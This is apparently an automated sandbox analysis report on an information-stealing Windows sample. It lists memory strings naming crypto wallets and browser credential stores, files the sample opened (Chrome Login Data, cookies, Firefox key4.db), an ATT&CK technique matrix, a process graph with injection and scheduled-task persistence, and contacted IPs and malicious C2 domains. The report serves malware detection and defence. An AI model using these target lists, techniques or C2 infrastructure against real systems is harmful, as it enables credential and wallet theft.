            Source: wab.exe, 00000004.00000003.1586959605.00000000063CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Exodus\backupExodus backup\MultiBitHDMultiBit HD\Electrum\wallets\ElectronCash\walletsElectron Cash\Electrum-btcp\walletsElectrum BTCP\walletsUnknown Wallet (Folder - wallets)Rockstar Gameswebview2Disc_Soft_FZE_LLCXuanZhi9BlueStacks Xpaint.netNox_shareGamesManagerPicasa2IBMTronLinkSystem Profile101libcatsxp.exeLocal Storage/home/anal/bot/zip_include/zip.c(zip->entry.header_offset & (pzip->m_file_offset_alignment - 1)) == 0105MaxonXuanZhiGoogleUpdaterd->m_huff_code_sizes[0][s_tdefl_len_sym[match_len]]d->m_huff_code_sizes[1][sym]d->m_huff_code_sizes[0][lit]Profiles\Roaming\\ProfilesConnectionsMMCInternet ExplorerMarcoMastroddiSWContent-Type: multipart/form-data; boundary=----Boundary%lu------Boundary%lu
            Source: wab.exe, 00000004.00000003.1586959605.00000000063CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Exodus\backupExodus backup\MultiBitHDMultiBit HD\Electrum\wallets\ElectronCash\walletsElectron Cash\Electrum-btcp\walletsElectrum BTCP\walletsUnknown Wallet (Folder - wallets)Rockstar Gameswebview2Disc_Soft_FZE_LLCXuanZhi9BlueStacks Xpaint.netNox_shareGamesManagerPicasa2IBMTronLinkSystem Profile101libcatsxp.exeLocal Storage/home/anal/bot/zip_include/zip.c(zip->entry.header_offset & (pzip->m_file_offset_alignment - 1)) == 0105MaxonXuanZhiGoogleUpdaterd->m_huff_code_sizes[0][s_tdefl_len_sym[match_len]]d->m_huff_code_sizes[1][sym]d->m_huff_code_sizes[0][lit]Profiles\Roaming\\ProfilesConnectionsMMCInternet ExplorerMarcoMastroddiSWContent-Type: multipart/form-data; boundary=----Boundary%lu------Boundary%lu
            Source: wab.exe, 00000004.00000003.1586959605.00000000063CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: txDux\JaxxbinanceApkProjectsDriveFSpeuApple ComputerSignalSpotifyCredentialsfactorCrashReportClientHisuiteGoToMeetingFortniteGame.gradlesync.anacondaBrowserCacheSandboxklnaejjgbibmhlephnhpmaofohgkpgkdaholpfdialjgjfhomihkjbmgjidlcdnohifafgmccdpekplomjjkcfgodnhcelljegjidjbpglichdcondbcbdnbeeppgdphsending
            Source: wab.exe, 00000004.00000003.1586959605.00000000063CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Exodus\backupExodus backup\MultiBitHDMultiBit HD\Electrum\wallets\ElectronCash\walletsElectron Cash\Electrum-btcp\walletsElectrum BTCP\walletsUnknown Wallet (Folder - wallets)Rockstar Gameswebview2Disc_Soft_FZE_LLCXuanZhi9BlueStacks Xpaint.netNox_shareGamesManagerPicasa2IBMTronLinkSystem Profile101libcatsxp.exeLocal Storage/home/anal/bot/zip_include/zip.c(zip->entry.header_offset & (pzip->m_file_offset_alignment - 1)) == 0105MaxonXuanZhiGoogleUpdaterd->m_huff_code_sizes[0][s_tdefl_len_sym[match_len]]d->m_huff_code_sizes[1][sym]d->m_huff_code_sizes[0][lit]Profiles\Roaming\\ProfilesConnectionsMMCInternet ExplorerMarcoMastroddiSWContent-Type: multipart/form-data; boundary=----Boundary%lu------Boundary%lu
            Source: wab.exe, 00000004.00000003.1586959605.00000000063CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ]BSteamCodeMPC-HCCitraWindows StoreZoomWinZipCode CacheSlackExodus EdenUbisoftEBWebViewNearbyAutoHotkeyOpen Media LLCnot initializedinvalid entry nameentry not foundinvalid zip modeinvalid compression levelno zip 64 supportmemset errorcannot write data to entrycannot initialize tdefl compressorinvalid indexheader not foundcannot flush tdefl buffercannot write entry headercannot create entry headercannot write to central dircannot open fileinvalid entry typeextracting data using no memory allocationfile not foundno permissionout of memoryinvalid zip archive namemake dir errorsymlink errorclose archive errorcapacity size too smallfseek errorfread errorfwrite errorcannot initialize readercannot initialize writercannot initialize writer from readerstream endneed dictionaryfile errorstream errordata errorout of memorybuf errorversion errorparameter errorservice123.exeehlOmWhNDTxTGhmOcdRs.dll111CrashReportDB.jdksworkspace-storageafter create buffernpm-cache.rspApplicationInsightsNVIDIA/home/anal/bot/zip_include/miniz.h(local_dir_header_ofs & (pZip->m_file_offset_alignment - 1)) == 0bit_flags & MZ_ZIP_LDH_BIT_FLAG_HAS_LOCATORDefaultOpera Cryptor+bwebviewCache115Visual StudiopreferencesfhilaheimglignddkjgofkcbgekhenbhffnbelfdoeiohenkjibnmadjiehjhajbafbcbjpbpfadlkmhmclhkeeodmamcflcfnjhmkhhmkbjkkabndcnnogagogbneecSearchesdollarclavecryptcript
            Source: wab.exe, 00000004.00000003.1586959605.00000000063CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 3zT4z>4zEthereum (UTC)localization-cacheVirtualBox VMsookjlbkiijinhpmnjffcofjonbfbgaocpkgsVisualStudioPowerPointCanvaUpdateChocolateydeemixbtcltcvshubWindows Sidebar
            Source: C:\Users\user\Documents\iofolko5\j1XaE_3LRXkWT1prPdjt1dhT.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite
            Source: C:\Users\user\Documents\iofolko5\j1XaE_3LRXkWT1prPdjt1dhT.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Users\user\Documents\iofolko5\j1XaE_3LRXkWT1prPdjt1dhT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Users\user\Documents\iofolko5\j1XaE_3LRXkWT1prPdjt1dhT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Users\user\Documents\iofolko5\j1XaE_3LRXkWT1prPdjt1dhT.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.db
            Source: C:\Users\user\Documents\iofolko5\j1XaE_3LRXkWT1prPdjt1dhT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Users\user\Documents\iofolko5\j1XaE_3LRXkWT1prPdjt1dhT.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: Yara matchFile source: Process Memory Space: j1XaE_3LRXkWT1prPdjt1dhT.exe PID: 1736, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: Process Memory Space: j1XaE_3LRXkWT1prPdjt1dhT.exe PID: 1736, type: MEMORYSTR
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Windows Management Instrumentation
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            211
            Disable or Modify Tools
            1
            OS Credential Dumping
            2
            System Time Discovery
            Remote Services1
            Archive Collected Data
            11
            Ingress Tool Transfer
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts11
            Native API
            1
            Scheduled Task/Job
            412
            Process Injection
            11
            Deobfuscate/Decode Files or Information
            LSASS Memory3
            File and Directory Discovery
            Remote Desktop Protocol2
            Data from Local System
            11
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            Shared Modules
            1
            Registry Run Keys / Startup Folder
            1
            Scheduled Task/Job
            3
            Obfuscated Files or Information
            Security Account Manager44
            System Information Discovery
            SMB/Windows Admin Shares1
            Screen Capture
            3
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts2
            Command and Scripting Interpreter
            Login Hook1
            Registry Run Keys / Startup Folder
            1
            Timestomp
            NTDS251
            Security Software Discovery
            Distributed Component Object Model2
            Clipboard Data
            124
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud Accounts1
            Scheduled Task/Job
            Network Logon ScriptNetwork Logon Script1
            DLL Side-Loading
            LSA Secrets2
            Process Discovery
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable Media1
            PowerShell
            RC ScriptsRC Scripts1
            Masquerading
            Cached Domain Credentials51
            Virtualization/Sandbox Evasion
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items51
            Virtualization/Sandbox Evasion
            DCSync1
            Application Window Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job412
            Process Injection
            Proc Filesystem1
            System Network Configuration Discovery
            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1516779 Sample: file.exe Startdate: 24/09/2024 Architecture: WINDOWS Score: 100 105 ipinfo.io 2->105 107 db-ip.com 2->107 109 3 other IPs or domains 2->109 119 Suricata IDS alerts for network traffic 2->119 121 Found malware configuration 2->121 123 Malicious sample detected (through community Yara rule) 2->123 125 16 other signatures 2->125 10 file.exe 1 3 2->10         started        13 z2_3yhxvvYYX1CmTdADYCHAQ.exe 2->13         started        16 z2_3yhxvvYYX1CmTdADYCHAQ.exe 2->16         started        18 service123.exe 2->18         started        signatures3 process4 file5 145 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 10->145 147 Writes to foreign memory regions 10->147 149 Allocates memory in foreign processes 10->149 151 4 other signatures 10->151 20 wab.exe 19 10->20         started        25 powershell.exe 23 10->25         started        27 WerFault.exe 19 16 10->27         started        29 wab.exe 10->29         started        81 C:\Users\user\AppData\Local\...\zlib1.dll, PE32+ 13->81 dropped 83 C:\Users\user\AppData\Local\...\win32pdh.pyd, PE32+ 13->83 dropped 85 C:\Users\user\AppData\Local\...\win32gui.pyd, PE32+ 13->85 dropped 93 49 other malicious files 13->93 dropped 31 z2_3yhxvvYYX1CmTdADYCHAQ.exe 13->31         started        87 C:\Users\user\AppData\Local\...\zlib1.dll, PE32+ 16->87 dropped 89 C:\Users\user\AppData\Local\...\win32pdh.pyd, PE32+ 16->89 dropped 91 C:\Users\user\AppData\Local\...\win32gui.pyd, PE32+ 16->91 dropped 95 49 other malicious files 16->95 dropped 33 z2_3yhxvvYYX1CmTdADYCHAQ.exe 16->33         started        signatures6 process7 dnsIp8 111 api64.ipify.org 173.231.16.77, 443, 49712, 49713 WEBNXUS United States 20->111 113 45.91.200.135, 49711, 49728, 80 ON-LINE-DATAServerlocation-NetherlandsDrontenNL Netherlands 20->113 115 5 other IPs or domains 20->115 71 C:\Users\...\z2_3yhxvvYYX1CmTdADYCHAQ.exe, PE32+ 20->71 dropped 73 C:\Users\...\j1XaE_3LRXkWT1prPdjt1dhT.exe, PE32 20->73 dropped 75 C:\Users\...\RXdQ_uc4E2f9zze8GHsJCP4V.exe, PE32 20->75 dropped 79 3 other malicious files 20->79 dropped 127 Found many strings related to Crypto-Wallets (likely being stolen) 20->127 35 z2_3yhxvvYYX1CmTdADYCHAQ.exe 1001 20->35         started        38 j1XaE_3LRXkWT1prPdjt1dhT.exe 20->38         started        42 RXdQ_uc4E2f9zze8GHsJCP4V.exe 20->42         started        129 Loading BitLocker PowerShell Module 25->129 44 WmiPrvSE.exe 25->44         started        46 conhost.exe 25->46         started        77 C:\ProgramData\Microsoft\...\Report.wer, Unicode 27->77 dropped file9 signatures10 process11 dnsIp12 59 C:\Users\user\AppData\Local\...\zlib1.dll, PE32+ 35->59 dropped 61 C:\Users\user\AppData\Local\...\win32pdh.pyd, PE32+ 35->61 dropped 63 C:\Users\user\AppData\Local\...\win32gui.pyd, PE32+ 35->63 dropped 69 49 other malicious files 35->69 dropped 48 z2_3yhxvvYYX1CmTdADYCHAQ.exe 35->48         started        117 5.53.124.195 SELECTELRU Russian Federation 38->117 65 C:\Users\user\AppData\...\service123.exe, PE32 38->65 dropped 67 C:\Users\user\...\ehlOmWhNDTxTGhmOcdRs.dll, PE32 38->67 dropped 131 Uses schtasks.exe or at.exe to add and modify task schedules 38->131 133 Tries to harvest and steal browser information (history, passwords, etc) 38->133 135 Drops large PE files 38->135 51 schtasks.exe 38->51         started        53 service123.exe 38->53         started        137 Writes to foreign memory regions 42->137 139 Allocates memory in foreign processes 42->139 141 Injects a PE file into a foreign processes 42->141 143 LummaC encrypted strings found 42->143 55 BitLockerToGo.exe 42->55         started        file13 signatures14 process15 dnsIp16 97 149.154.167.220 TELEGRAMRU United Kingdom 48->97 99 104.26.13.205 CLOUDFLARENETUS United States 48->99 57 conhost.exe 51->57         started        101 104.21.51.224 CLOUDFLARENETUS United States 55->101 103 104.102.49.254 AKAMAI-ASUS United States 55->103 process17

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            file.exe18%ReversingLabs
            file.exe100%Joe Sandbox ML
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\Channel2[1].exe63%ReversingLabsWin32.Trojan.Privateloader
            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\CheckTool[1].exe18%ReversingLabs
            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\tac[1].exe29%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI28002\PIL\_imaging.cp312-win_amd64.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI28002\PIL\_imagingcms.cp312-win_amd64.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI28002\PIL\_imagingmath.cp312-win_amd64.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI28002\PIL\_imagingtk.cp312-win_amd64.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI28002\PIL\_webp.cp312-win_amd64.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI28002\VCRUNTIME140.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI28002\VCRUNTIME140_1.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI28002\_asyncio.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI28002\_bz2.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI28002\_ctypes.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI28002\_decimal.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI28002\_hashlib.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI28002\_lzma.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI28002\_multiprocessing.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI28002\_overlapped.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI28002\_queue.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI28002\_socket.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI28002\_ssl.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI28002\_tkinter.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI28002\_wmi.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI28002\charset_normalizer\md.cp312-win_amd64.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI28002\charset_normalizer\md__mypyc.cp312-win_amd64.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI28002\libcrypto-3.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI28002\libffi-8.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI28002\libssl-3.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI28002\numpy.libs\libscipy_openblas64_-c16e4918366c6bc1f1cd71e28ca36fc0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI28002\numpy.libs\msvcp140-23ebcc0b37c8e3d074511f362feac48b.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI28002\numpy\_core\_multiarray_tests.cp312-win_amd64.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI28002\numpy\_core\_multiarray_umath.cp312-win_amd64.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI28002\numpy\fft\_pocketfft_umath.cp312-win_amd64.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI28002\numpy\linalg\_umath_linalg.cp312-win_amd64.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI28002\numpy\random\_bounded_integers.cp312-win_amd64.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI28002\numpy\random\_common.cp312-win_amd64.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI28002\numpy\random\_generator.cp312-win_amd64.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI28002\numpy\random\_mt19937.cp312-win_amd64.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI28002\numpy\random\_pcg64.cp312-win_amd64.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI28002\numpy\random\_philox.cp312-win_amd64.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI28002\numpy\random\_sfc64.cp312-win_amd64.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI28002\numpy\random\bit_generator.cp312-win_amd64.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI28002\numpy\random\mtrand.cp312-win_amd64.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI28002\pyexpat.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI28002\python312.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI28002\pywin32_system32\pywintypes312.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI28002\select.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI28002\setuptools\_vendor\autocommand-2.2.2.dist-info\METADATA0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI28002\setuptools\_vendor\tomli-2.0.1.dist-info\METADATA0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI28002\tcl86t.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI28002\tk86t.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI28002\unicodedata.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI28002\win32\win32gui.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI28002\win32\win32pdh.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI28002\zlib1.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI33402\PIL\_imaging.cp312-win_amd64.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI33402\PIL\_imagingcms.cp312-win_amd64.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI33402\PIL\_imagingmath.cp312-win_amd64.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI33402\PIL\_imagingtk.cp312-win_amd64.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI33402\PIL\_webp.cp312-win_amd64.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI33402\VCRUNTIME140.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI33402\VCRUNTIME140_1.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI33402\_asyncio.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI33402\_bz2.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI33402\_ctypes.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI33402\_decimal.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI33402\_hashlib.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI33402\_lzma.pyd0%ReversingLabs
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            NameIPActiveMaliciousAntivirus DetectionReputation
            api.myip.com
            104.26.9.59
            truefalse
              ipinfo.io
              34.117.59.81
              truefalse
                db-ip.com
                104.26.5.15
                truefalse
                  api64.ipify.org
                  173.231.16.77
                  truefalse
                    58yongzhe.com
                    unknown
                    unknownfalse
                      NameMaliciousAntivirus DetectionReputation
                      relaxatinownio.shoptrue
                        tendencctywop.shoptrue
                          tryyudjasudqo.shoptrue
                            https://steamcommunity.com/profiles/76561199724331900false
                              tesecuuweqo.shoptrue
                                analforeverlovyu.toptrue
                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://core.telegram.org/bots/api#botnamez2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2702275438.000001E7D9900000.00000004.00001000.00020000.00000000.sdmpfalse
                                    http://www.scipy.org/not/real/data.txtz2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1925997584.000001E7D2100000.00000004.00000020.00020000.00000000.sdmpfalse
                                      https://core.telegram.org/bots/api#sendvenuez2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2689816267.000001E7D2242000.00000004.00000020.00020000.00000000.sdmpfalse
                                        https://use.typekit.net/af/705e94/00000000000000003b9b3062/27/a?primer=7cdcb44be4a7db8877ffa5c0007b8wab.exe, 00000004.00000003.1454833562.0000000003546000.00000004.00000020.00020000.00000000.sdmpfalse
                                          https://core.telegram.org/bots/api#transactionpartnerotherz2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2689816267.000001E7D2242000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmpfalse
                                            https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.filter_exceptz2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpfalse
                                              https://core.telegram.org/bots/api#inlinequeryresultz2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1923291891.000001E7D201B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1925997584.000001E7D201E000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1925375209.000001E7D201B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2687605749.000001E7D201B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                https://core.telegram.org/bots/api#transactionpartnerfragmentz2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2702275438.000001E7D9900000.00000004.00001000.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1922858841.000001E7D2E50000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2E50000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  https://core.telegram.org/bots/api#getchatmembercountz2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1923291891.000001E7D201B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1925997584.000001E7D201E000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1925375209.000001E7D201B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2687605749.000001E7D201B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    https://core.telegram.org/bots/api#messagereactioncountupdatedz2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.zip_broadcastz2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        https://website-cdn.ipinfo.io/_next/static/media/youtube-light.cf5a6d38.svgwab.exe, 00000004.00000003.1454793864.0000000003551000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          https://wheel.readthedocs.io/en/stable/news.htmlz2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000002.2680451847.000001A40899D000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1902278313.000001A40899D000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1900520747.000001A4089C1000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000002.2680451847.000001A4089C1000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1902278313.000001A4089C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6BitLockerToGo.exe, 00000013.00000003.1979956654.000000000363A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1979700668.00000000035B8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.random_productz2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.groupby_transformz2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  https://core.telegram.org/bots/api#forumtopicz2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1923291891.000001E7D201B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1925997584.000001E7D201E000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1925375209.000001E7D201B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2687605749.000001E7D201B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    https://core.telegram.org/bots/api#chatadministratorrightsz2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2687605749.000001E7D21C9000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1922858841.000001E7D2E50000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2E50000.00000004.00000020.00020000.00000000.sdmpfalse
